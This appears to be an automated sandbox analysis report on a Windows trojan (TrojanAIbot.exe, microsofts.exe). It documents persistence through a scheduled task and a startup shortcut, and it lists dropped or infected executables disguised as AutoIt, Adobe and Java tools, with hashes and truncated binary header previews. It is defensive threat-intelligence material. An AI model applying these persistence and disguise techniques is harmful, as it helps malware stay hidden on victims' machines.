                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtReadFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • Report size getting too big, too many NtWriteFile calls found.
                                                                                                                                                                                                                                                                                                                                                                                                              • VT rate limit hit for: AENiBH7X1q.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                                                                                                                                                                                                                              11:02:52API Interceptor82x Sleep call for process: alg.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                              11:02:53API Interceptor688847x Sleep call for process: microsofts.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                              11:02:53API Interceptor19x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                              11:02:55API Interceptor331155x Sleep call for process: TrojanAIbot.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                              11:03:35API Interceptor199x Sleep call for process: msdtc.exe modified
                                                                                                                                                                                                                                                                                                                                                                                                              17:02:54Task SchedulerRun new task: AccSys path: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                                                                                                                                                                                                                                                                                                              17:02:58AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TrojanAIbot.exe.lnk

                                                                                                                                                                                                                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                                                                                                                                                                                                                              IPs

                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                              Domains

                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                              No context

                                                                                                                                                                                                                                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Check.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1353216
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324381662705354
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:6C4VQjGARQNhipXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DB9:6OCAR0ipsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:C89A73FC07C14FA518734BBAD2B34525
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:4A01447E8D64E6BE57F136FD7B84ABCED55DADEF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:118709FE1B73EB6E0AD35FA16FE0E6E18FD5DDAB293DA17ED7EA3635F8251774
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:432FB4C64E113D143EA8E221DFE3CADE113B8FC7F5CDF24EE34901FF389DF363C1A453BC48E68DF88EC4B1877F157C2012E0095352DC722AC26CDBF559D0A06B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@...........................!......K......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc....P...p...@...f..............@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Info.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1294848
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.282692239633622
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:3NUpaKghOXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:3CMKg4sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:95350539C1E9EB379356A8C099771C80
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C3712BA12931134A42E1F96967212AAD840CDBEA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:748D7D2D2978EAB8880B519C63908C202CC89B683187322510BA3EF05C049E88
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:885AB01351B97FA26FF16A6EA65982B9880C94A9F9BD08302A2334D5FB030B76F02BBBD5439F4961D6270DE72F63091D4F11C2A98C5D4D4153018EE9B900B372
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........jZ..9Z..9Z..9...9Q..9...9%..9...9B..9...8r..9...8K..9...8H..9S.x9W..9Z..9..9...8]..9...9[..9Z.|9[..9...8[..9RichZ..9........PE..L...C.(c.........."......:...........\.......P....@........................... .............................................$...........0..............................8...............................@............P...............................text...19.......:.................. ..`.rdata...|...P...~...>..............@..@.data...............................@....rsrc...0...........................@..@.reloc...`...`...P...r..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1314304
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.274129673178493
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:4MEhwdbTFXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CKdHFsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:23C7E89737F9E6F55E286B6C620529F8
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1C5891F24B7086086A6E141B3044BB218202353C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E69D7546DF9558348B06B6C4106940203F00489CCA78528C4E7061FECB88454A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:06C84D68E4C5745DF2EA45D9F5F0F2C97BEE0FAC26788493345182432F20D547327CF35EFDBE20439C2C5C9482D43D19BE5E5FA85660281966FBB208439458EC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9..X...X...X..-....X..-....X..-....X...0...X...0...X...0...X... n..X...X..YX..<1.X..<1...X...Xj..X..<1...X..Rich.X..........................PE..d...G.(c.........."......J...^......Tr.........@............................. !......'.... .................................................,........ ..0...............................8............................................`..`............................text....H.......J.................. ..`.rdata.......`.......N..............@..@.data........ ......................@....pdata..............................@..@.rsrc...0.... ......."..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2203136
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.647023602416916
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:mK0eqkSR7Xgo4TiRPnLWvJRDmg27RnWGj:mK0pR7Xn4TiRCvJRD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:0621B7A5FA2B037D9B922E8D68C34689
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:74FEA694A9F139CDEB61FF617E1903EA658BFF1C
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A2BDDDD4125E021D1C78646E11738BC2E70FA7519D6B28C382C6ED6EF02097BA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1C85219F80414578BF575C7D9B2C211FC58913D949A022291D4EA0B1E17C2BDEB48FF15D6675561301212AEA592E971373C0840A84898EAB368686453428086D
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................Y;6....Y;4.x...Y;5...........................D......T...........H......H.8.....P....H......Rich...................PE..L...9.(c..........#..................d............@..........................."......."..............................................p..X...............................p...............................@...............X............................text.............................. ..`.rdata..$H.......J..................@..@.data....@... ......................@....rsrc........p......................@...................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2369024
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.565055605190179
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:hfYP1JsEDkSR7Xgo4TiRPnLWvJRDmg27RnWGj:RYPBR7Xn4TiRCvJRD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:1881841B389BB748D753DEC529898B64
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:859A6A5DE667BE0408E0A9BAA845CEA744A7541D
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9C3BE021ADEB39AD914B2AAD426E5C15F6657BC054E8A91642B43F07A0C4D35B
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:C680A51863E684881C1887972562CD26B7B0A13FA7B3DACB04E6682C81B1C197BF12F65C700A39260DC785038D88F07C2BCE4A399606A5CB74E552ACC2C2FFC9
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<y..x...x...x....~.s....|......}.a...*p..i...*p..p...*p..H...q`..z...q`..a...x...s....q..[....qp.y...x...z....q..y...Richx...........PE..d...>.(c..........#..........0......(..........@..............................$.......$... .............................................................X........e...................n..p...................0p..(...0o...............0...............................text............................... ..`.rdata.......0......."..............@..@.data....R...0... ... ..............@....pdata...e.......f...@..............@..@.rsrc...............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1245184
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.123553567266901
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:L62SYUcknnDXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:gYUcknDsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2306907FB62205C9B663C6AC1A29197A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5E14615B0D365AF74185011FE5374D5D56752701
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:9BB83B1E97566584DF95FFF8814C7EA1615E1077D43A5A01622B7E5ECEB45596
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9EB0B0BC8A74BC351A622D5CD43BD1C9356C0E33F1AFC732D21AC11C6590A2626657DF6C205FCAE92F64E169E9AA8DC933B1F18E3AEB1707CE63AA99D1774ECC
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........[m..5>..5>..5>OC.>..5>OC.>..5>OC.>..5>..0?..5>..1?..5>..6?..5>.>..5>..4>..5>.>..5>^.<?..5>^..>..5>..>..5>^.7?..5>Rich..5>........................PE..L.....(c..........................................@..........................@......Ek.......................................%..d....P.................................8...............................@...............t............................text.............................. ..`.rdata...^.......`..................@..@.data...l....0....... ..............@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1640448
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.166650096045539
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:X+iAqSPyC+NltpScpzbtvpJoMQSq/jrQaSlDmg27RnWGj:9SktbpHD527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:843605846E5764C8315C47356EE24D34
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:7D5A223CB395CCC8D09681885BEAD63D9F2F4BC2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:356D41707C9CE6F4BF0BC076D2A9812DF069B3B26829DB781E8F1B658664C0D2
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F266CE39AEE6DE747C4776A723417A524553FE9BC74BC9AD7D070DB381723F9FB7DE72FEDFEB7E7105D4C4354254EC2E640F63A38E87F0E737ED34A1B8F7C6D6
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@....................................p@.... ...@...............@..............................l..|.......P....P...o.................. .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc...............(..............@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2953728
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.094603860303217
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:49152:FGSXoV72tpV9XE8Wwi1aCvYMdVluS/fYw44RxLaDmg27RnWGj:Z4OEtwiICvYMRf6D527BWG
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A723B41A340C0CF5C8A287E697EF77BD
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8891871D4CFB6A1381D809A52B54651B9E074090
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:416D293F860D0D04DA2F89A9A092B4328AEB9783EB369DBA5A4897ADD144DF65
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3F23C054BEB5356774825E040A003EDED0744767391CAE22AC15F065FF87583F4A9132CC8CAC21D8A8C1F3EBFC1A1B7E16543A899A2C51F0EEAE03EC61F10A61
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b.rk...k.@rk.....@rk...i.@rk.RichArk.........................PE..L.....(c.....................~....................@..........................P-.....;4-.............................p...<............@ .............................@...p...................P...........@............................................text...e........................... ..`.rdata...^.......`..................@..@.data...`....0......................@....rsrc........@ ....... .............@..@.reloc.......P#......"#.............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1485824
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.496391618897693
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:lAMuR+3kMbVjh5sqjnhMgeiCl7G0nehbGZpbD:iD+lbVjh9Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ED1FE1E559DAFDA264F1980EB1AE7B49
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FA53519BFBD082D92C6E3620A7BB768F4AD9DFDC
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CFD9201DECC3A9E82FE518589D153D74E846CBF2F3DC35A4952B6C95EF6E20FA
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CBE72243F7E26FAD4F7780116B7416D89905B937E805198959FAFB60193FD9B51E93152187A4C8A7D67BE3CF1A512B45322618BAA2574B91B9B67D9967F30109
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4...Uu..Uu..Uu..=v..Uu..=q..Uu..=p.pUu..=s..Uu..8q..Uu..8v..Uu..8p.@Uu.....Uu..=t..Uu..Ut..Wu.Z;p..Uu.Z;...Uu..U...Uu.Z;w..Uu.Rich.Uu.................PE..L......d.................N...P...............`....@..........................................................................`..@.......(...............................T...............................@............`..L............................text...zL.......N.................. ..`.rdata.......`.......R..............@..@.data...\D...........p..............@....rsrc...(...........................@..@.reloc...........p...<..............@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1290240
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.277756438902528
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12288:IImGUcsvZZdubv7hfl3NXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:IxGBcml9sqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8EDA018E049620D65BF7CDB965F5B5BB
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:37629A11BB7AD6BE8545F40AEBEF40676822DC6F
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:F9C4EE7787C388B0F1873CAEB0515D872813CC4CBD074609719BB9284CEBFF67
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:90C948903FA8D39743D82E51B5DC0A52CB1838FDBE73A1E65238650BFC48FAB925B2EE775750FA6FB41A97213C74A586793AC788380EC20F129C1982C0D86C1B
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.................................@8......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.694795213808657
                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24576:u0vHyeLj8trn3wszsqjnhMgeiCl7G0nehbGZpbD:/tj4rgs3Dmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                              MD5:185661426251F556123EE7C18139947A
                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:49EE100B7663620AE97FF890B913A42283D28BBF
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D4BE76DF8D85607A4CF45EC2159C147799F97E9EBEA5D59D93EFD38A5DD102E3
                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8F0722508DE3CC519F0D1B5C865AFAAF13746B9C200AFCCC0DBD7E731E7BFB07DFF00AB6F956B3D1C3F801750D6A8B6A0749F4935F0688305520BD81D1F061D4
                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.279659127389356
